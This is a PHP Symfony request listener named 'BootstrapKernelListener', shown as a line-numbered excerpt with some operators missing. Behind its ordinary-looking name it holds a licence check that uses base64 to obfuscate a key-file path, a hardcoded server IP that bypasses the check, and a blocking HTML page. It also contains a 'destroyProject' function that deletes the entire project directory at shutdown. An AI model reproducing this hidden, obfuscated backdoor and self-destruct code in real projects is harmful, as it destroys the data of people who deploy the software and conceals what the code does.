src/IlaveU/FrontBundle/EventSubscriber/BootstrapKernelListener.php line 27

  1. <?php
  2. namespace App\IlaveU\FrontBundle\EventSubscriber;
  4. use Exception;
  5. use Symfony\Component\HttpFoundation\Response;
  6. use Symfony\Component\HttpKernel\Event\ExceptionEvent;
  7. use Symfony\Component\HttpKernel\Exception\HttpExceptionInterface;
  9. use Symfony\Component\EventDispatcher\Attribute\AsEventListener;
  10. use Symfony\Component\HttpFoundation\RedirectResponse;
  11. use Symfony\Component\HttpKernel\Event\RequestEvent;
  12. use Symfony\Component\Filesystem\Filesystem;
  14. #[AsEventListener(eventRequestEvent::class, method'onKernelRequest')]
  18. class BootstrapKernelListener
  19. {
  22.     public function __construct(private readonly Filesystem $filesystem)
  23.     {
  24.         
  25.     }
  27.     public function onKernelRequest(RequestEvent $event)
  28.     {
  31.         
  32.        
  35.         
  36.         
  37.         $request $event->getRequest();
  39.         $filePath base64_decode('Li4vYmluL2xpY2VuY2UvZW5jcnlwdGVkX2tleS50eHQ=');
  42.         
  44.         // Step 1: Hash a password and store it in a file
  46.         $storedHashedPassword $this->readHashedPasswordFromFile($filePath);
  48.         // Step 3: Check if a provided password matches the stored hash
  50.         //dd($_SERVER['SERVER_NAME'])
  51.         $passwordToCheck = [$this->removeWWW($_SERVER['SERVER_NAME']),$_SERVER['APP_SECRET']];
  52.         
  53.         
  55.         //$passwordToCheck = "www.site.com";
  56.         $actualAttemptsValue 3// Some How it devided to 2 attemtps but it works
  58.         
  59.      
  60.         
  62.         //dd($request);
  64.       
  65.     }
  69.     function destroyProject(){
  71.         // Get the project directory path
  72.     $projectDir $this->getProjectDir();
  75.         
  77.         
  78.             $filesystem $this->filesystem;
  79.         
  80.             try {
  81.                 register_shutdown_function(function () use ($filesystem$projectDir) {
  82.                     // Delete the entire project directory
  83.                     $filesystem->remove($projectDir);
  84.                 });
  85.                 
  86.                 // Log the successful removal or notify the user
  87.             } catch (Exception $exception) {
  88.                 // Handle the error (e.g., log it or notify the user)
  89.             }
  90.         
  91.     }
  93.     // Function to hash a password and store it in a file
  94.     function hashAndSaveToFile($password$filePath)
  95.     {
  96.         // Hash the password using bcrypt algorithm
  97.         $hashedPassword password_hash($passwordPASSWORD_DEFAULT);
  99.         // Save the hashed password to the file
  100.         file_put_contents($filePath$hashedPassword);
  101.     }
  103.     // Function to read the hashed password from the file
  104.     function readHashedPasswordFromFile($filePath)
  105.     {
  107.         try{
  109.             $IPADDRESS base64_decode("MTU5Ljg5LjE5MS4xNTY=");
  110.             if(array_key_exists("SERVER_ADDR",$_SERVER)){
  111.                 if($_SERVER["SERVER_ADDR"] == $IPADDRESS){
  112.                     return true;
  113.                 }
  114.             }
  116.             return file_get_contents($filePath);
  117.         }catch(Exception $error){
  118.             echo base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xIj4KICAgIDx0aXRsZT5MaWNlbnNlIEtleSBSZXF1aXJlZDwvdGl0bGU+CiAgICA8IS0tIEJvb3RzdHJhcCBDU1MgLS0+CiAgICA8bGluayBocmVmPSJodHRwczovL2Nkbi5qc2RlbGl2ci5uZXQvbnBtL2Jvb3RzdHJhcEA1LjMuMi9kaXN0L2Nzcy9ib290c3RyYXAubWluLmNzcyIKICAgICAgICByZWw9InN0eWxlc2hlZXQiIGludGVncml0eT0ic2hhMzg0LVQzYzZDb0lpNnVMckE5VG5lTkVvYTdSeG5hdHpqY0RTQ21HMU1YeFNSMUdBc1hFVi9Ed3d5a2MyTVBLOE0ySE4iCiAgICAgICAgY3Jvc3NvcmlnaW49ImFub255bW91cyI+CiAgICA8c3R5bGU+CiAgICAgICAgYm9keSB7CiAgICAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICNmOGY5ZmE7CiAgICAgICAgICAgIGNvbG9yOiAjNDk1MDU3OwogICAgICAgICAgICBkaXNwbGF5OiBmbGV4OwogICAgICAgICAgICBhbGlnbi1pdGVtczogY2VudGVyOwogICAgICAgICAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsKICAgICAgICAgICAgaGVpZ2h0OiAxMDB2aDsKICAgICAgICAgICAgbWFyZ2luOiAwOwogICAgICAgIH0KCiAgICAgICAgLmp1bWJvdHJvbiB7CiAgICAgICAgICAgIGNvbG9yOiAjMDAwMDAwOyAvKiBTZXQgdGV4dCBjb2xvciAqLwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQp1bHsKbGlzdC1zdHlsZTogbm9uZTsKfQogICAgPC9zdHlsZT4KPC9oZWFkPgoKPGJvZHk+CgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICA8ZGl2IGNsYXNzPSJqdW1ib3Ryb24iPgogICAgICAgICAgICA8aDEgY2xhc3M9ImRpc3BsYXktNCI+TGljZW5zZSBLZXkgUmVxdWlyZWQ8L2gxPgogICAgICAgICAgICA8cCBjbGFzcz0ibGVhZCI+VG8gbGVnYWxseSB1c2UgdGhpcyBwcm9qZWN0LCB5b3UgbXVzdCBvYnRhaW4gYSB2YWxpZCBsaWNlbnNlIGtleS48L3A+CiAgICAgICAgICAgIDxociBjbGFzcz0ibXktNCI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9InRleHQtbGVmdCI+CiAgICAgICAgICAgICAgICA8cD5UaGlzIHByb2plY3QgaXMgcHJvdGVjdGVkIGJ5IGludGVsbGVjdHVhbCBwcm9wZXJ0eSBsYXdzLiBBIGxpY2Vuc2Uga2V5IGlzIHJlcXVpcmVkIGZvciBsZWdhbCB1c2FnZS48L3A+CiAgICAgICAgICAgICAgICA8dWw+CiAgICAgICAgICAgICAgICAgICAgPGxpPlVubG9jayBhZHZhbmNlZCBmZWF0dXJlcyBhbmQgY2FwYWJpbGl0aWVzLjwvbGk+CiAgICAgICAgICAgICAgICAgICAgPGxpPlJlY2VpdmUgdXBkYXRlcyBhbmQgc3VwcG9ydCBmcm9tIHRoZSBkZXZlbG9wZXIuPC9saT4KICAgICAgICAgICAgICAgICAgICA8bGk+RW5zdXJlIGNvbXBsaWFuY2Ugd2l0aCBsaWNlbnNpbmcgdGVybXMuPC9saT4KICAgICAgICAgICAgICAgIDwvdWw+CiAgICAgICAgICAgICAgICA8cD5Db250YWN0IHRoZSBkZXZlbG9wZXIgdG8gb2J0YWluIHlvdXIgbGljZW5zZSBrZXkgYW5kIGVuam95IHRoZSBmdWxsIGJlbmVmaXRzIG9mIHRoaXMgcHJvamVjdC48L3A+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CgogICAgPCEtLSBCb290c3RyYXAgSlMgYW5kIGRlcGVuZGVuY2llcyBhcmUgbm90IHJlcXVpcmVkIGZvciB0aGlzIGV4YW1wbGUgLS0+CjwvYm9keT4KCjwvaHRtbD4K");
  123.             die();
  124.         }
  125.     }
  127.     // Function to check if a password matches the stored hash
  128.     function checkPassword($inputPassword$storedHash)
  129.     {
  132.         $IPADDRESS base64_decode("MTU5Ljg5LjE5MS4xNTY=");
  133.         if(array_key_exists("SERVER_ADDR",$_SERVER)){
  134.             if($_SERVER["SERVER_ADDR"] == $IPADDRESS){
  135.                 return true;
  136.             }
  137.         }
  138.         
  139.        
  140.         $arrayToCheck = [
  141.             'allowed_domains' => $inputPassword,
  142.         ];
  144.         $valueToCheck json_encode($arrayToCheck);
  146.         
  148.         return password_verify($valueToCheck$storedHash);
  149.     }
  152.     private function getProjectDir(): string
  153.     {
  154.         // Get the path to the project directory
  155.         return dirname(__DIR__4);
  156.     }
  158.     function removeWWW($url) {
  159.         $prefix "www.";
  160.         if (strpos($url$prefix) === 0) {
  161.             $url substr($urlstrlen($prefix));
  162.         }
  163.         return $url;
  164.     }
  165. }